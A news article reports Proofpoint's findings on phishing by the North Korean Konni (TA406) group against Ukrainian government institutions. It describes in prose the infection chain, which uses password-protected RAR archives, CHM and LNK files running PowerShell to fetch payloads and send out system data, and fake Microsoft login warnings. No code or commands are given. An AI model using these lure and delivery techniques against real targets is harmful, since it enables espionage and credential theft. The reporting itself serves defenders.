North Korean hacker group Konni APT is conducting phishing campaigns targeting Ukrainian government institutions. This was reported by the American company Proofpoint, which specializes in corporate security.
The set of attacks involves phishing emails posing as a fictitious senior employee of an analytical center called the Royal Institute of Strategic Studies, which is a non-existent organization, according to The Hacker News.
The emails contain a link to a password-protected RAR archive hosted on the MEGA cloud service. Opening the RAR archive using the password provided in the email triggers a chain of infection designed for large-scale reconnaissance of compromised machines.
In particular, the RAR archive contains a CHM file that displays a lure related to Valerii Zaluzhnyi. If the victim clicks anywhere on the page, a PowerShell command embedded in the HTML is executed to connect to an external server and download the next PowerShell payload.
The launched PowerShell script can execute various commands to collect system information, encode it using Base64, and send it to the same server.
“The hackers sent several phishing emails over the course of several days. When the victim did not click the link, they were asked whether they had received previous emails and whether they would download the files,” said the researchers.
Proofpoint also reported observing how the HTML file was directly distributed as an attachment in phishing emails. In this variant of the attack, the victim is instructed to click on an embedded link in the HTML file, which leads to the download of a ZIP archive containing a safe PDF file and a Windows shortcut (LNK) file.
When the LNK is executed, it runs PowerShell, encoded in Base64, to delete a Javascript file called “Themes.jse” using a Visual Basic script. The malicious JSE software, in turn, connects to a URL controlled by the hackers and triggers a response from the server via PowerShell. The exact nature of the payload is currently unknown.
Additionally, it has been observed that TA406 is attempting to collect credentials by sending fake Microsoft security messages to Ukrainian government agencies from ProtonMail accounts, warning them about suspicious login activity from IP addresses located in the United States and urging them to confirm their login by following a link.
“It is highly likely that TA406 is gathering intelligence to help the North Korean leadership assess the current risk to their forces already involved in military operations, as well as the likelihood that Russia will request more troops or weapons,” explained Proofpoint.
Although the phishing page was not restored, the same compromised domain was reportedly used in the past to collect login information for Naver.
“Unlike Russian groups, which are likely tasked with gathering tactical battlefield intelligence and identifying targets against Ukrainian forces on the ground, TA406 generally focuses on more strategic efforts to collect political intelligence,” added the cybersecurity experts.
